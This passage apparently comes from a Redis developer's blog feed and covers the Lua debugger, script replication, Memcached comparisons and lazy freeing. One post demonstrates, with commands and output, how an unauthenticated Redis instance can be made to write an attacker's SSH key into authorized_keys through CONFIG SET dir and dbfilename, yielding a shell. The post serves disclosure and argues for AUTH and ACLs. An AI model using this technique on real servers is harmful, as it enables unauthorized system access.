                     the next line of code.
lua debugger>

How does it work?
---

The whole debugger is pretty much a self-contained block of 1300 lines of code, mostly inside scripting.c, with a few inside redis-cli.c in order to implement the special CLI mode acting as a client for the debugger. As already said, this is a server-client remote debugger.

The Lua C API has a debugging interface that’s pretty useful. It is not a debugger per se, but it offers the primitives you need in order to write one. However writing a debugger in the context of Redis was a bit less trivial than writing a stand-alone Lua debugger. In order to debug the script you have callbacks executed while the script is running. But when Redis is running a script, we are in the context of EVAL, executing a client command. How do we do I/O there if we are blocked? Also, what happens to the Redis server? Even if debugging must be performed on a development server and not on a production server, completely hanging the instance may not be a good idea. Maybe other developers want to use the instance, or the single developer that is debugging the script wants to create a new parallel debugging session. And finally, what about rolling back the changes so that the same script can be tested again and again with the same Redis data set, regardless of the changes it makes while we are debugging? Determinism is gold in the context of debugging.

So I needed a complex implementation, apparently. Or I needed to cheat big time, and find a strange solution to the problem involving a lot less code and complexity, but giving 90% of the benefits I was looking for. This odd solution turned out to be the following:

* When a debugging session starts, fork() Redis.
* Capture the client file descriptor, and do direct, blocking I/O while the debugging session is active.
* Use the Redis protocol, but a trivial subset that can be implemented in a couple of lines of code, so that we don’t re-enter the Redis event loop at all. The I/O is part of the debugger.

After 400 lines of code I had all the basics working, so the rest was just a matter of adding features and fixing bugs and corner cases.

This gives us everything we needed: the server is not blocked, since each debugging session is a separate process. We don’t need to re-enter the event loop from within the middle of an EVAL call, and we have rollback for free.
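
The idea is simple enough that a toy sketch fits in a few lines of Python (this is just an illustration of the forking approach described above, not the actual C implementation inside Redis):

import os, socket

def start_debug_session(client_sock: socket.socket):
    pid = os.fork()
    if pid != 0:
        return   # parent: the server keeps serving the other clients
    # Child: a copy-on-write copy of the dataset. Changes made while
    # stepping through the script die with the process, which is what
    # gives rollback for free.
    client_sock.setblocking(True)   # direct, blocking I/O: no event loop
    while True:
        data = client_sock.recv(4096)
        if not data:
            break
        # ... parse the debugger command, step the script, send replies ...
    os._exit(0)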

However, there is also a synchronous mode available, which blocks the server, in case you really need to debug something while preserving the changes to the dataset. I have the feeling it will not be used much, but adding it was just a matter of not forking and handling the cleanup of the client at the end, so this mode is available as well.

On top of that, it was possible to add everything else using a Lua “line” hook in order to implement stepping and breakpoints. Since the debugger is integrated inside Redis itself, it was trivial to capture all the Redis calls to show the user what was happening. The I/O model is also trivial: we just read input from the user and append output to a buffer. Every time the debugger stops at some point, the output is flushed to the client as an array of “status replies”. The prefix of each line tells redis-cli which colorization to apply.

Because of this design, the debugger was working after 2 days and was complete after 4 days of work. Moreover this design allowed me to write completely self-contained code, so the debugger interacts almost zero with the rest of Redis. This made it possible to release it with Redis 3.2 in December.

A simple way to make the debugger much more powerful almost for free was to add two new Redis Lua calls: redis.breakpoint() and redis.debug(), which respectively can simulate a breakpoint inside the debugger (at the next line to be executed), or log Lua objects in the debugger console. This way you can add breakpoints that only fire when something interesting happens:

if some_odd_condition then redis.breakpoint() end

This effectively replaces a lot of complex features you may add to a debugger. However we also have all the normal features directly inside the debugger, like static breakpoints, the ability to observe the state, and so forth.

I’m very interested in what users writing complex scripts will think about it!
We’ll see.

Script effects replication
---

Before understanding why replicating just the *effects* of a script is interesting, it’s better to understand why replicating the script itself, to be re-executed by slaves, was considered the best option, and is anyway still the default. The central matter is the bandwidth between the master and the slave, and in general the ability of the slave to “follow” the master (keeping in sync without too much delay) without lagging behind.

Think about this small Redis Lua script:

for i=0,1000000 do
    redis.call("lpush", KEYS[1], ARGV[1])
end

It appends 1 million elements to the specified list, and runs in 0.75 seconds in my testing environment. It’s just a few bytes, and runs inside the server, so replicating this script as a script, and not as the 1 million commands resulting from its execution, makes a lot of sense.

There are scripts which are exactly the opposite. On the other side of the spectrum, think of a script that calculates the average of 1 million integer elements stored in a list, and stores the result in some key with SET.

The effect of the script could be just: SET somekey 94.29

But the actual execution is maybe 2 seconds of computation. Replicating this script as the resulting command is much better. However there is a difference between replicating scripts and replicating effects: both are optimal or suboptimal depending on the use case, but replicating scripts always works, even when it’s inefficient. It never creates a situation where the replication link has to transfer huge amounts of data, nor does it create a situation where the slave has to do a lot more work than the master. This is why so far Redis always replicated scripts verbatim.

However the most interesting part, perhaps, is that it’s not just a matter of efficiency. When replicating scripts, each script must be a *pure function*: scripts executed with the same initial dataset must always produce the same result. This requirement prevents users from writing scripts using, for example, the TIME command, or SRANDMEMBER. Redis detects this dangerous condition and stops the script as soon as the first write command is going to be called.

Yet there are many use cases for scripts using the current time, random numbers or random elements. Replicating the effects of the script also overcomes this limitation.

So finally, and thanks to refactoring performed inside Redis in the previous months, it was possible to implement opt-in support for script effects replication. It is as trivial as calling, at the start of the script, the following command:

redis.replicate_commands()
… do something with the script …

The script will be replicated only as a set of write commands.
Actually there is no need to call replicate_commands() as the first command. It is enough to call it before any write, so the Lua script may even check the work to do and select the right replication model. If writes were already performed when replicate_commands() is called, it just returns false, and the normal whole script replication will be used, so the command will never prevent the script from running, even when misused.
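
For example, here is a sketch (driven via redis-py, with a key name I made up) of a script that would be rejected under whole-script replication, because it calls TIME before writing, but is perfectly fine under effects replication:

import redis

r = redis.Redis()

SCRIPT = """
redis.replicate_commands()    -- switch to effects replication
local t = redis.call('time')  -- non deterministic: allowed now
return redis.call('set', KEYS[1], t[1])
"""

# Only the resulting SET is replicated to the slaves and to the AOF.
r.eval(SCRIPT, 1, "last-run-time")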

However we did not resist the temptation of doing more advanced and possibly dangerous things. I designed this feature with my colleague Yossi Gottlieb from Redis Labs, and he had a very compelling use case for a dangerous feature allowing the exclusion of selected commands from the replication stream.

The idea is that your script may do something like that:

1) Call certain commands that write temporary values. Think about intersections between sets, just to have a mental model.
2) Perform some aggregation.
3) Store a small result as the effect of the script.
4) Discard the temporary values.

There are a few legitimate use cases for the above pattern, and guess what, you don’t want to replicate the temporary writes to your AOF and slaves. You want to replicate just step “3”. So in the end we decided that, when script effects replication is enabled, it is possible for the brave user to select what to replicate and what not, by using the following API:

redis.set_repl(redis.REPL_ALL); -- The default
redis.set_repl(redis.REPL_NONE); -- No replication at all
redis.set_repl(redis.REPL_AOF); -- Just AOF replication
redis.set_repl(redis.REPL_SLAVE); -- Just slaves replication

There is a lot of room for misuse, but non-expert users are very unlikely to touch this feature at all, and it can benefit those who know what to do with powerful tools.

ETA
---

Both features will be available in Redis 3.2, which will be out as an RC in mid December 2015.
Redis 3.2 is going to have many interesting new features at the API level, exposed to users. A big part of the user base asked for this, after a period where we focused more on operations and internals maturity.

Feel free to ask questions in the comments if you want to know more or have any doubt.

Hacker News thread is here: https://news.ycombinator.com/item?id=10594236
http://antirez.com/news/97
A few things about Redis security http://antirez.com/news/96 http://antirez.com/news/96 Tue, 03 Nov 2015 08:53:04 +0000
From time to time I get security reports about Redis. It’s good to get reports, but it’s odd that what I get is usually about things like Lua sandbox escaping, insecure temporary file creation, and similar issues, in a software which is designed (as we explain in our security page here http://redis.io/topics/security) to be totally insecure if exposed to the outside world.

Yet these bug reports are often useful, since there are different levels of security concerning any software in general, and Redis specifically. What can you do if you have access to the database: just modify the content of the database itself, or also compromise the local system where Redis is running?

How important a given security layer is in a system depends on its security model. Is the system designed to have untrusted users accessing it, like a web server, for example? Are there different levels of authorization for different kinds of users?

The Redis security model is: “it’s totally insecure to let untrusted clients access the system, please protect it from the outside world yourself”. The reason is that, basically, 99.99% of the Redis use cases are inside a sandboxed environment. Security is complex. Adding security features adds complexity. Complexity for 0.01% of use cases is not great, but it is a matter of design philosophy, so you may disagree of course.

The problem is that, whatever we state in our security page, there are a lot of Redis instances exposed to the internet unintentionally. Not because the use case requires outside clients to access Redis, but because nobody bothered to protect a given Redis instance from outside access via firewalling, enabling AUTH, binding it to 127.0.0.1 if only local clients are accessing it, and so forth.

Let’s crack Redis for fun and no profit at all given I’m the developer of this thing
===

In order to show the Redis “security model” in a cruel way, I did a quick 5 minutes experiment. In our security page we hint at big issues if Redis is exposed. You can read: “However, the ability to control the server configuration using the CONFIG command makes the client able to change the working directory of the program and the name of the dump file. This allows clients to write RDB Redis files at random paths, that is a security issue that may easily lead to the ability to run untrusted code as the same user as Redis is running”.

So my experiment was the following: I’ll run a Redis instance on my Macbook Air, without touching the computer configuration compared to what I currently have. Now, from another host, my goal is to compromise my laptop.

So, to start let’s check if I can access the instance, which is a prerequisite:

$ telnet 192.168.1.11 6379
Trying 192.168.1.11...
Connected to 192.168.1.11.
Escape character is '^]'.
echo "Hey no AUTH required!"
$21
Hey no AUTH required!
quit
+OK
Connection closed by foreign host.

Works, and no AUTH required: Redis is unprotected without a password set up, and so forth. The simplest thing you can do in such a case is to write random files. Guess what? My Macbook Air happens to run an SSH server. What about trying to write something into ~/.ssh/authorized_keys in order to gain access?

Let’s start generating a new SSH key:

$ ssh-keygen -t rsa -C "crack@redis.io"
Generating public/private rsa key pair.
Enter file in which to save the key (/home/antirez/.ssh/id_rsa): ./id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa.
Your public key has been saved in ./id_rsa.pub.
The key fingerprint is:
f0:a1:52:e9:0d:5f:e4:d9:35:33:73:43:b4:c8:b9:27 crack@redis.io
The key's randomart image is:
+--[ RSA 2048]----+
| . O+.|
| . o o..o*o|
| = . + .+ . |
| o B o . |
| . o S E . |
| . o |
| |
| |
| |
+-----------------+

Now I’ve a key. My goal is to put it into the Redis server memory, and later to transfer it into a file, in a way that the resulting authorized_keys file is still a valid one. Using the RDB format to do this has the problem that the output will be binary and may in theory also compress strings. But well, maybe this is not a problem. To start let’s pad the public SSH key I generated with newlines before and after the content:

$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

Now foo.txt is just our public key but with newlines. We can write this string inside the memory of Redis using redis-cli:

~~~~~~~~~~~~~~~~~~~
NOTE: The following steps were altered in trivial ways to avoid that script kiddies cut & paste the attack, because from the moment this attack was published several Redis instances were compromised around the globe.
~~~~~~~~~~~~~~~~~~~

$ redis-cli -h 192.168.1.11
192.168.1.11:6379> config set dbfilename "backup.rdb"
OK
192.168.1.11:6379> save
OK
(Ctrl+C)

$ redis-cli -h 192.168.1.11 echo flushall
$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit

Looks good. How to dump our memory content into the authorized_keys file? That’s
kinda trivial.

$ redis-cli -h 192.168.1.11
192.168.1.11:6379> config set dir /Users/antirez/.ssh/
OK
192.168.1.11:6379> config get dir
1) "dir"
2) "/Users/antirez/.ssh"
192.168.1.11:6379> config set dbfilename "authorized.keys"
OK
192.168.1.11:6379> save
OK

At this point the target authorized keys file should be full of garbage, but should also include our public key. The string does not have simple patterns, so it’s unlikely that it was compressed inside the RDB file. Will ssh be so naive as to parse a totally corrupted file without issues, and accept the only sane entry inside?

$ ssh -i id_rsa antirez@192.168.1.11
Enter passphrase for key 'id_rsa':
Last login: Mon Nov 2 15:58:43 2015 from 192.168.1.10
~ ➤ hostname
Salvatores-MacBook-Air.local

Yes. I successfully gained access as the Redis user, with a proper shell, in like five seconds. Courtesy of an unprotected Redis instance being, basically, an on-demand write-this-file server; and, in this case, of ssh not being conservative enough to deny access to a file which is entirely composed of corrupted keys except for one single entry. However ssh is not the problem here: once you can write files, even with binary garbage inside, it’s a matter of time before you gain access to the system in one way or the other.

How to fix this crap?
===

We say Redis is insecure if exposed, and the security model of Redis is to be accessed only by authorized and trusted clients. But this is unfortunately not enough. Users will still run it unprotected, and even worse, there is a tension between making Redis more secure *against* deployment errors, and making Redis easy to use for people just using it for development, or inside secure environments where limits are not needed.

Let’s make an example. Newer versions of Redis ship with an example redis.conf defaulting to “bind 127.0.0.1”. If you run the server without arguments, it will still bind all interfaces, since I don’t want to annoy users who are likely running Redis for development. Having to reconfigure an example server just to allow connections from other hosts is kind of a big price to pay, to win just a little bit of security for people that don’t care. However the example redis.conf that many users use as a template for their configuration defaults to binding the localhost interface. Hopefully fewer deployment errors will be made.

However these measures are not very effective, because unfortunately what most security-unaware users will do, after realizing that binding 127.0.0.1 prevents them from connecting clients from the outside, is to just drop the bind line and restart. And we are back to the insecure configuration.

Basically the problem is finding a compromise between the following three things:

1. Making Redis accessible without annoyances for people that know what they do.

2. Making Redis less insecure for people that don’t know what they do.

3. My bias towards “1” instead of “2” because RTFM.

Users ACLs to mitigate the problem
===

One way to add redundancy to the “isolation” concept of Redis from the outside world is to use the AUTH command. It’s very simple: you configure Redis to require a password, and clients authenticate via the AUTH command using the configured password. The mechanism is trivial: the password is not hashed, and is stated in cleartext inside the configuration file and inside the application, so it’s like a shared secret.

While this is not resistant against people sniffing your TCP connections
or compromising your application servers, it’s an effective layer of security
against the obvious mistake of leaving unprotected Redis instances on the internet.

A few notes about AUTH:

1. You can use Redis as an oracle in order to test many passwords per second, but the password does not need to be stored in a human memory, just in the Redis config file and client configurations, so pick a very large one and make it impossible to brute force (see the example after this list).

2. AUTH is sent when the connection is created, and most sane applications have persistent connections, so it is a very small cost to pay. It’s also an extremely fast command to execute, like GET or SET: neither the disk nor any other external system is touched.

3. It’s a good layer of protection even for well sandboxed environments. By mistake, an instance may end up exposed, if not to the internet, at least to clients that should not be able to talk with it.
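
For example, a quick way to generate a password with plenty of entropy, using Python (any equivalent source of random bits works):

import binascii, os

# 32 random bytes = 256 bits of entropy: even an oracle answering
# millions of AUTH attempts per second will never brute force this.
print(binascii.hexlify(os.urandom(32)).decode())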

Maybe evolving AUTH is the right path in order to gain more security, so
some time ago I published a proposal to add “real users” in Redis: https://github.com/redis/redis-rcp/blob/master/RCP1.md

This proposal basically adds users with ACLs. It’s very similar to AUTH in the way it works and in the speed of execution, but different users have different capabilities. For example normal users are not able to access administrative commands by default, so no “CONFIG SET dir” for them, and no issues like the exploit above.

The default user can still run the normal commands (so the patches people sent me about Lua sandboxing, which I applied, are very useful indeed), while an admin user must be configured in order to use administration commands. However what we could do to make Redis more user friendly is to always have an “admin” user with an empty password which is accepted if the connection comes from the loopback interface (with the possibility to disable this feature).

ACLs, while not perfect, have certain advantages. When Redis is exposed to the internet in the proper way, proxied via SSL, having an additional layer of access control is very useful. Even when no SSL is used, since we have just local clients, protecting what clients can do with more fine-grained control has several advantages. For instance it can protect against programming or administration errors: FLUSHALL and FLUSHDB could be disallowed for normal users, the client for a Redis monitoring service would use a user allowed to run only a few selected commands, and so forth.

Users that don’t care about protecting their instances will still have a database which is accessible from the outside, but without admin commands available, which still makes things insecure from the point of view of the data contained inside the database, but more secure from the point of view of the system running the Redis instance.

Basically it is impossible to reach the goal of making Redis user friendly by default and resistant against big security mistakes of users spinning up an instance bound to a public IP address. However fixing bugs in the API that may allow executing untrusted code with the same privileges as the Redis process, shipping a more conservative default configuration, and implementing multiple users with ACLs, could improve the current state of Redis security without much impact on the experience of normal Redis users who know what they are doing.

Moreover ACLs have the advantage of allowing application developers to create
users that match the actual limits of specific clients in the context of the
application logic, making mistakes less likely to create big issues.

A drawback of even this simple layer of security is that it adds complexity, especially in the context of replication, Redis Sentinel, and other systems that must all be authentication-aware in order to work well in this new context. However it’s probably an effort that must be done incrementally.

Hacker News: https://news.ycombinator.com/item?id=10537852

Reddit: https://www.reddit.com/r/redis/comments/3rby8c/a_few_things_about_redis_security/
http://antirez.com/news/96
Moving the Redis community on Reddit http://antirez.com/news/95 http://antirez.com/news/95 Thu, 22 Oct 2015 08:14:38 +0000
This probably looks like a crazy idea in some way, and “to move” is probably not the right verb, since the ML will still exist. However it will only be used in order to receive announcements of new releases, critical information like security-related notices, and, from time to time, links to very important discussions that are happening on Reddit.

Why move? We have a huge mailing list that has served us for years at this point, and there is a decent amount of traffic going on.
People go there to get some help, to propose new ideas, and so forth. However, while we have some traffic, the Redis mailing list is IMHO far from the “vital” thing it should be, considering the number of users using Redis currently. For the most part we see the same questions again and again, and it is hard to understand whether a reply is really worthwhile or not. Moreover an important topic sometimes slides away because new topics arrive, sometimes without getting much attention at all. It’s as if the ML were just a far echo of the Redis popularity, not the center of its community.

Twitter, while being a tool completely unsuitable to become the center of a community that needs to discuss things at length, is completely different, and gives me feedback about how the Redis ML is in some way broken. It’s a lot more vital, and it is possible to get quality feedback, but everything is limited to 140 characters in flat threads where eventually it is kind of impossible to continue any sane discussion. However Twitter, and other signals I get, are the proof that people *moved away* from email. I bet a huge number of users subscribed to the ML just archive it under a label and read it seldom or never.

So why Reddit instead? Because it’s the center of the most vital communities on the internet today. Because it’s centered on a voting system, so if a user asks for help, even if you don’t want to contribute, you can use comment voting to tell the difference between a lame request and a great one, a poor reply and an outstanding one. Reddit also allows voting on topics, so that things which are important for the community will get more contributions. It has a sidebar that can be used for FAQs and other important pointers, and it has a ton of existing subscribers.

Reddit also contains “gamification” elements that may be useful and fun. For example you can associate small sentences or images with your username in a given sub-reddit, in order to state, for example, whether you use Redis for caching, as a store, for messaging or whatever. Your reply in a given context can be read more clearly if it is possible to understand what kind of Redis user you are.

It is possible to write guidelines in the submission page, so that people realize what to provide before posting. For example we’ll have warnings telling you to post the INFO output of your master and slaves if you want us to investigate your replication issues.

So, what happens now? I asked the Reddit admins to get access to /r/redis, which is a sub created years ago but apparently not actively administered. When I receive the admin privileges I’ll set up the sub in order to only accept comment submissions (not direct links; you’ll still be able to post a link if you comment on it). At that point the Redis ML will be modified in order to moderate each single message, and we’ll advise people posting help questions to go on Reddit. The Redis.io community page will be updated to instruct new users about Reddit being our primary discussion forum.

Why not use Discourse or Stack Overflow, you'll ask? SO is great but it is not suitable for general conversation, and we need that a lot. People will continue to post Redis questions on SO and we'll continue to reply, of course. Discourse is more an evolution of the mailing list we are using, but it is not, technically speaking, a "social site": we want to go where communities already are and where voting is the main idea, so that as the Redis community grows we have a way to filter the most interesting contributions and highlight them.

Maybe the experiment will fail and we'll go back to the mailing list, or we'll try Discourse, but I think too important a change in the way programmers communicate is happening to ignore it. I must try. I think email lost, in some way; it is no longer something that scales. For me it lost several years ago: I rarely reply to emails at all, since they are a tool that does not take into account people's inability to scale their reading to too many messages. I hope we'll have a great time on Reddit. See you there!

P.s. if you are a Reddit admin reading this, please evaluate my request to take ownership of /r/redis here: https://www.reddit.com/r/redditrequest/comments/3pnwrx/requesting_rredis/
http://antirez.com/news/95
Clarifications about Redis and Memcached http://antirez.com/news/94 http://antirez.com/news/94 Sat, 26 Sep 2015 16:16:14 +0000 However it is also true that in order to pick the right solution users must be correctly informed.

This post was triggered by reading a blog post published by Mike Perham, whom you may know as the author of a popular library called Sidekiq, which happens to use Redis as its backend. So I would not consider Mike a person who is "against" Redis at all. Yet in his blog post, which you can find at the URL http://www.mikeperham.com/2015/09/24/storing-data-with-redis/, he states that, for caching, "you should probably use Memcached instead [of Redis]". So Mike really believes Redis is not good for caching, and he argues his thesis this way:

1) Memcached is designed for caching.
2) It performs no disk I/O at all.
3) It is multi-threaded and can handle hundreds of thousands of requests by scaling across multiple cores.

I’ll address the above statements, and later provide further information which is not captured by the above sentences and which is, in my opinion, more relevant to most caching users and use cases.

Memcached is designed for caching: I’ll skip this since it is not an argument. I can say “Redis is designed for caching”. So in this regard they are exactly the same, let’s move to the next thing.

It performs no disk I/O at all: In Redis you can simply disable disk I/O entirely if you want, providing you with a purely in-memory experience. Except that, if you really need it, you can persist the database only when you are about to reboot, for example with “SHUTDOWN SAVE”. The bottom line here is that Redis persistence is an added value even when you don’t use it at all.
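
For example, a minimal sketch of a pure-cache setup (assuming the default configuration where AOF is disabled): turn off RDB snapshots at runtime, and save only right before a planned reboot.

127.0.0.1:6379> CONFIG SET save ""
OK
127.0.0.1:6379> SHUTDOWN SAVE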

It is multi threaded: This is true, and one of my goals is to make Redis I/O threaded as well, like in memcached (where, basically, the data access itself is not threaded). However Redis, especially using pipelining, can serve an impressive amount of requests per second per thread (half a million is a common figure with very intensive pipelining; without pipelining it is around 100,000 ops/sec). In the vanilla caching scenario where each Redis instance is the same, works as a master, disk ops are disabled, and sharding is up to the client as in the “memcached sharding model”, spinning up multiple Redis processes per system is not terrible. Once you do this, what you get is a shared-nothing multi-threaded setup, so what counts is the number of operations you can serve per single thread. Last time I checked, Redis was at least as fast as memcached per thread. Implementations change over time, so the edge today may belong to one or the other, but I bet they provide similar performance since they both tend to maximize the resources they can use. Memcached multi-threading is still an advantage since it makes things simpler to use and administer, but I think it is not a crucial point.
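
You can get a feel for the per-thread figures yourself using the redis-benchmark tool bundled with Redis; for example the following run measures GET and SET with a pipeline of 16 commands (the exact numbers depend heavily on your hardware):

redis-benchmark -q -n 1000000 -t get,set -P 16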

There is more. Mike talks about operations per second without citing the *quality* of the operations. The thing is, in systems like Redis and Memcached the cost of command dispatching and I/O dominates compared to actually touching the in-memory data structures. So in Redis, executing a simple GET, a SET, or a complex operation like ZRANK costs about the same. But what you can achieve with a complex operation is a lot more work from the point of view of the application. Maybe instead of fetching five cached values you can just send a small Lua script. So the actual “scalability” of the two systems has many dimensions, and what you can achieve per operation is one of them.
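
As a sketch of the idea, a single round trip with a trivial Lua script can replace five GET round trips (assuming hypothetical keys k1..k5 exist):

127.0.0.1:6379> EVAL "local r = {} for i, k in ipairs(KEYS) do r[i] = redis.call('GET', k) end return r" 5 k1 k2 k3 k4 k5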

Of Mike’s concerns the only valid one I can see is multi-threading, which, if we consider Redis in its special case of a memcached replacement, may be addressed by running multiple processes, or simply by running just one, since it will be very very hard to saturate one thread with memcached-alike operations.

The real differences


Now it’s time to talk about the *real* differences between the two systems.

* Memory efficiency

This is where Memcached used to be better than Redis. In a system designed to represent a plain string-to-string dictionary, it is simpler to make better use of memory. This difference is not dramatic, and it’s been about five years since I last checked, but it used to be noticeable.

However if we consider memory efficiency of a long running process, things are a bit different. Read the next section.

But again, to really evaluate memory efficiency, you should factor in that specially encoded small aggregate values in Redis are very memory efficient. For example sets of small integers are represented internally as an array of 16, 32 or 64 bit integers, and are accessed in logarithmic time when you want to check the existence of a member, since they are kept ordered, so binary search can be used.

The same happens when you use hashes to represent objects instead of resorting to JSON. So the real memory efficiency must be evaluated with a use case at hand.
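
For example, with a hypothetical user:103 key, on a Redis of this era a small hash is stored with the compact ziplist encoding instead of a real hash table:

127.0.0.1:6379> HMSET user:103 name "alice" age "30"
OK
127.0.0.1:6379> OBJECT ENCODING user:103
"ziplist"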

* Redis LRU vs Slab allocator

Memcached is not perfect from the point of view of memory utilization. If you happen to have an application that dramatically changes the size of the cached values over time, you are likely to incur severe fragmentation, and the only cure is a reboot. Redis is a lot more deterministic from this point of view.

Moreover Redis LRU was recently improved a lot, and is now a very good approximation of true LRU. More info can be found here: http://redis.io/topics/lru-cache. If I understand correctly, memcached LRU still expires according to its slab allocator, so sometimes the behavior may be far from true LRU, but I would like to hear what experts have to say about this. If you want to test Redis LRU you can now do so using the redis-cli LRU testing mode available in recent versions of Redis.
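
In recent redis-cli builds the invocation looks like the following, where the argument is the number of simulated keys in the cache workload:

redis-cli --lru-test 10000000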

* Smart caching

If you want to use Redis for caching, but use it à la memcached, you are truly missing something. This is the biggest mistake in Mike’s blog post in my opinion. People are switching to Redis more and more because they discovered that they can represent their cached data in more useful ways. Want to retain the latest N items of something? Use a capped list. Want to keep a cached popularity index? Use a sorted set, and so forth.
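
The capped list pattern, for instance, is just two commands (hypothetical key name): every push is followed by a trim, so only the most recent 100 items are retained.

127.0.0.1:6379> LPUSH latest.news "new-item"
(integer) 1
127.0.0.1:6379> LTRIM latest.news 0 99
OK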

* Persistence and Replication

If you need those, they are very important assets. For example, with this model, scaling a huge load of reads is very simple. The same goes for restarts with persistence, the ability to take cache snapshots over time, and so forth. But it’s totally fair to have usages where both features are totally irrelevant. What I want to say here is that there are “pure caching” use cases where persistence and replication are important.

* Observability

Redis is very, very observable. It has detailed reporting of a ton of internal metrics; you can SCAN the dataset, observe the expiration of objects, tune the LRU algorithm, give names to clients and see them reported in CLIENT LIST, use “MONITOR” to debug your application, and many other advanced things. I believe this to be an advantage.
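
For example, naming a connection and then finding it again (output abbreviated; the exact CLIENT LIST fields vary by version):

127.0.0.1:6379> CLIENT SETNAME worker-1
OK
127.0.0.1:6379> CLIENT LIST
id=3 addr=127.0.0.1:51932 ... name=worker-1 ... cmd=client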

* Lua scripting

I believe Lua scripting to be an impressive help in many caching use cases. For example if you have a cached JSON blob, with a Lua script you can extract a single field and return it to the client instead of transferring everything (you can do the same, conceptually, by using Redis hashes directly to represent objects).
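
A minimal sketch of the idea, using the cjson library bundled with Redis Lua scripting (hypothetical key and payload):

127.0.0.1:6379> SET user:103:json '{"name":"alice","age":30}'
OK
127.0.0.1:6379> EVAL "return cjson.decode(redis.call('GET', KEYS[1])).name" 1 user:103:json
"alice"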

Conclusions


Memcached is a great piece of software. I read the source code multiple times, it was a revolution in our industry, and you should check whether it is a better bet for you compared to Redis. However things must be evaluated for what they are, and in the end I was a bit annoyed to read Mike’s report and very similar reports over the years, so I decided to show you my point of view. If you find anything factually incorrect, ping me and I’ll update the blog post with “EDIT” sections.
http://antirez.com/news/94
Lazy Redis is better Redis http://antirez.com/news/93 http://antirez.com/news/93 Sat, 26 Sep 2015 07:56:32 +0000
However some time ago I opened an issue where I promised a new Redis feature that many wanted, me included, called “lazy free”. The original issue is here: https://github.com/antirez/redis/issues/1748.

The gist of the issue is that Redis DEL operations are normally blocking, so if you send Redis “DEL mykey” and your key happens to have 50 million objects, the server will block for seconds without serving anything in the meantime. Historically this was accepted mostly as a side effect of the Redis design, but it is a limit in certain use cases. DEL is not the only blocking command, but it is a special one, since usually we say: Redis is very fast as long as you use O(1) and O(log_N) commands. You are free to use O(N) commands, but be aware that it’s not the case we optimized for; be prepared for latency spikes.

This sounds reasonable, but at the same time, even objects created with fast operations need to be deleted. And in this case, Redis blocks.

The first attempt


In a single-threaded server the easy way to make operations non-blocking is to do things incrementally instead of stopping the world. So if there are 1 million allocations to free, instead of blocking everything in a for() loop, we can free 1000 elements every millisecond, for example. The CPU time used is the same, or a bit more since there is more logic, but the latency from the point of view of the user is way better. Maybe those cycles spent freeing 1000 elements per millisecond were not even being used anyway. Avoiding blocking for seconds is the key here. This is how many things inside Redis work: LRU eviction and key expiration are two obvious examples, but there are more, like the incremental rehashing of hash tables.

So this was the first thing I tried: create a new timer function, and perform the eviction there. Objects were just queued into a linked list, to be reclaimed slowly and incrementally each time the timer function was called. This requires some tricks to work well. For example objects implemented with hash tables were also reclaimed incrementally, using the same mechanism used inside the Redis SCAN command: taking a cursor inside the dictionary and iterating it to free element after element. This way, in each timer call, we don’t have to free a whole hash table. The cursor tells us where we left off when we re-enter the timer function.

Adaptive is hard


Do you know what the hard part of this is? That this time we are doing a very special task incrementally: we are freeing memory. So if, while we free memory incrementally, the server memory rises very fast, we may end up, for the sake of latency, consuming an *unbounded* amount of memory. Which is very bad. Imagine this, for example:

WHILE 1
    SADD myset element1 element2 … many many many elements
    DEL myset
END

If deleting myset in the background is slower compared to our SADD call adding tons of elements per call, our memory usage will grow forever.

However after a few experiments, I found a way to make it work very well. The timer function used two ideas in order to adapt to the memory pressure:

1. Check the memory trend: is it rising or falling? Use this to adapt how aggressively to free.
2. Also adapt the timer frequency itself based on “1”, so that we don’t waste CPU time when there is little to free, with continuous interruptions of the event loop. At the same time the timer could reach ~300 HZ when really needed.

A small portion of code, from the now no longer existing function implementing these ideas:

/* Compute the memory trend, biased towards thinking memory is raising
 * for a few calls every time previous and current memory raise. */
if (prev_mem < mem) mem_trend = 1;
mem_trend *= 0.9; /* Make it slowly forget. */
int mem_is_raising = mem_trend > .1;

/* Free a few items. */
size_t workdone = lazyfreeStep(LAZYFREE_STEP_SLOW);

/* Adjust this timer call frequency according to the current state. */
if (workdone) {
    if (timer_period == 1000) timer_period = 20;
    if (mem_is_raising && timer_period > 3)
        timer_period--; /* Raise call frequency. */
    else if (!mem_is_raising && timer_period < 20)
        timer_period++; /* Lower call frequency. */
} else {
    timer_period = 1000; /* 1 HZ */
}

It’s a good trick and it worked very well. But it was still kinda sad that we had to do this operation in a single thread. There was a lot of logic to handle it well, and anyway when the lazy free cycle was very busy, operations per second were reduced to around 65% of the norm.

Freeing objects in a different thread would be much simpler: freeing is almost always faster than adding new values to the dataset, if there is a thread which is busy doing only free operations.
For sure there is some contention between the main thread calling the allocator and the lazy free thread doing the same, but Redis spends only a fraction of its time on allocations, and much more time on I/O, command dispatching, cache misses, and so forth.

However there was a big problem with implementing a threaded lazy free: Redis itself. The internal design was totally biased towards sharing objects around. After all, they are reference counted, right? So why not share as much as possible? We can save memory and time. A few examples: if you do SUNIONSTORE you end up with shared objects in the target set. Similarly, client output buffers have lists of objects to send to the socket as a reply, so during a call like SMEMBERS all the set members may end up shared in the output buffer list. So sharing objects sounds so useful, lovely, wonderfully, greatly cool.

But, hey, there is something more here. If after an SUNIONSTORE I re-load the database, the objects get unshared, so memory may suddenly jump to more than it was. Not great. Moreover, what happens when we send replies to clients? We actually *glue together* objects into plain buffers when they are small, since otherwise doing many write() calls is not efficient! (Free hint: writev() does not help.) So we are mostly copying already. And in programming, when something exists but is not useful, it is likely a problem.

And indeed each time you had to access a value, inside a key containing an aggregate data type, you had to traverse the following:

key -> value_obj -> hash table -> robj -> sds_string

So what about getting rid of the “robj” structures entirely and converting aggregate values to be made of just hash tables (or skiplists) of SDS strings? (SDS is the library we use inside Redis for strings.)
There is a problem with that. Imagine a command like SADD myset myvalue. We can’t take client->argv[2], for example, and just reference it in the hash table implementing the set. We sometimes have to *duplicate* values and can’t reuse the ones already existing in the client argument vector, created when the command was parsed. However Redis performance is dominated by cache misses, so maybe we can compensate for this with one level of indirection less?

So I started to work on this new lazyfree branch, tweeting about it on Twitter without any context, so that everybody thought I was desperate or crazy (a few eventually asked WTF this lazyfree thing was). So what did I do?

1. Change client output buffers to use just dynamic strings instead of robj structures. Values are always copied when a reply must be created.
2. Convert all the Redis data types to use SDS strings instead of shared robj structures. Sounds trivial? ~800 highly bug-sensitive lines changed over the course of multiple weeks. But now all tests are passing.
